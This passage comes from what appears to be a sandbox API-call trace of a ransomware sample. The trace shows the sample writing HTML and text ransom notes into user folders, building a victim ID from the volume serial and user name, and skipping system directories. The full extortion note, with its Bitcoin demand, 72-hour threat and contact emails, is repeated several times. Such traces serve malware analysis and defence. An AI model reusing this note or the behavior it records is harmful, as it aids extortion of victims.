You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.767] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0179.770] CloseHandle (hObject=0x380) returned 1
	[0179.770] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.770] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.771] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.771] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0179.772] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.772] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\downloads\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.772] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.772] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.773] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0179.773] CloseHandle (hObject=0x380) returned 1
	[0179.773] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*.*" (normalized: "c:\\users\\default\\downloads\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x84aefa30, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0179.773] lstrlenW (lpString="C:\\Users\\Default\\Downloads\\*.*") returned 30
	[0179.773] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.774] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Downloads\\*.*", cchLength=0x1e | out: lpsz="c:\\users\\default\\downloads\\*.*") returned 0x1e
	[0179.774] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.774] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="windows") returned 0x0
	[0179.774] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.774] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="boot") returned 0x0
	[0179.774] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.775] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="system volume information") returned 0x0
	[0179.775] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.775] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.775] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.775] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="temp") returned 0x0
	[0179.775] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.775] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="program files") returned 0x0
	[0179.776] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.776] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.776] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.776] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="appdata") returned 0x0
	[0179.776] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.776] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="application data") returned 0x0
	[0179.776] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.777] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="winnt") returned 0x0
	[0179.777] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.777] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="tmp") returned 0x0
	[0179.777] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.777] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="cache") returned 0x0
	[0179.777] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.778] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.778] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.778] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="webcache") returned 0x0
	[0179.778] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.778] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="inetcache") returned 0x0
	[0179.778] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.779] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="nvidia") returned 0x0
	[0179.779] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.779] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="packages") returned 0x0
	[0179.779] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.779] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="cookies") returned 0x0
	[0179.779] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.779] StrStrW (lpFirst="c:\\users\\default\\downloads\\*.*", lpSrch="programdata") returned 0x0
	[0179.780] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0179.780] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0179.780] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x84aefa30, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.780] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0179.780] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84aefa30, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84aefa30, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84aefa30, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0179.780] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84ac9948, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84ac9948, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84ac9948, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0179.780] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84ac9948, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84ac9948, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84ac9948, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0179.780] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0179.780] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0179.781] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1
	[0179.781] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1
	[0179.781] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1
	[0179.781] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0179.781] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.781] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites"
	[0179.781] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites"
	[0179.781] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\"
	[0179.781] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Favorites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\"
	[0179.782] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\*.*") returned="C:\\Users\\Default\\Favorites\\*.*"
	[0179.787] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*.*" (normalized: "c:\\users\\default\\favorites\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0179.787] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\*.*") returned 30
	[0179.787] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.788] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\*.*", cchLength=0x1e | out: lpsz="c:\\users\\default\\favorites\\*.*") returned 0x1e
	[0179.788] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.788] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="windows") returned 0x0
	[0179.788] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.788] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="boot") returned 0x0
	[0179.788] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.788] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="system volume information") returned 0x0
	[0179.789] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.789] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.789] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.789] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="temp") returned 0x0
	[0179.789] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.790] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="program files") returned 0x0
	[0179.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.790] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.790] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="appdata") returned 0x0
	[0179.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.791] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="application data") returned 0x0
	[0179.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.791] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="winnt") returned 0x0
	[0179.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.791] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="tmp") returned 0x0
	[0179.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.791] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="cache") returned 0x0
	[0179.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.792] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.792] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="webcache") returned 0x0
	[0179.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.792] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="inetcache") returned 0x0
	[0179.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.793] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="nvidia") returned 0x0
	[0179.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.793] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="packages") returned 0x0
	[0179.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.793] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="cookies") returned 0x0
	[0179.793] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.794] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="programdata") returned 0x0
	[0179.794] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.794] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0179.794] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0179.794] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0179.795] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites"
	[0179.795] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\*.*") returned="C:\\Users\\Default\\Favorites\\*.*"
	[0179.795] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.795] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.795] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Favorites\\HELP_DECRYPT_YOUR_FILES.TXT") returned 54
	[0179.796] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\favorites\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.796] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.796] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.815] CloseHandle (hObject=0x380) returned 1
	[0179.815] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.815] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.816] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0179.817] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.817] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\favorites\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.817] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.817] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.817] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0179.818] CloseHandle (hObject=0x380) returned 1
	[0179.818] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.818] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.818] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.818] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Favorites\\HELP_DECRYPT_YOUR_FILES.HTML") returned 55
	[0179.818] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\favorites\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.819] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.819] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0179.821] CloseHandle (hObject=0x380) returned 1
	[0179.821] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.822] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.822] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.822] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0179.823] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.823] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\favorites\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.824] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.824] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.824] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0179.824] CloseHandle (hObject=0x380) returned 1
	[0179.824] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*.*" (normalized: "c:\\users\\default\\favorites\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x84b620de, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
